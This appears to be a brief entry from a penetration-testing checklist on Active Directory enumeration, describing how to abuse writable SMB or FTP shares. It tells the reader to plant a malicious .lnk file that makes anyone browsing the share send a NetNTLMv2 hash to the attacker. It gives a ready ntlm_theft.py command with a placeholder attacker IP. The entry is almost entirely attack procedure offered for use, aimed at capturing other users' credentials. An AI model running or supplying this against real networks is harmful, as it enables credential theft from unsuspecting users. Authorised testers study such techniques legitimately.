← Back to search

Check Upload to SMB/FTP

ad enumchecklist

Summary

Drop the malicious file in a writable share to coerce NTLM auth.

Walkthrough

Test writable SMB/FTP shares and plant NTLM-theft payloads (e.g. malicious .lnk) that fire when browsed. A hit captures a NetNTLMv2 hash from any user who opens the directory.

Commands

bash

python3 ntlm_theft.py -g lnk -s <ATTACKER_IP> -f vault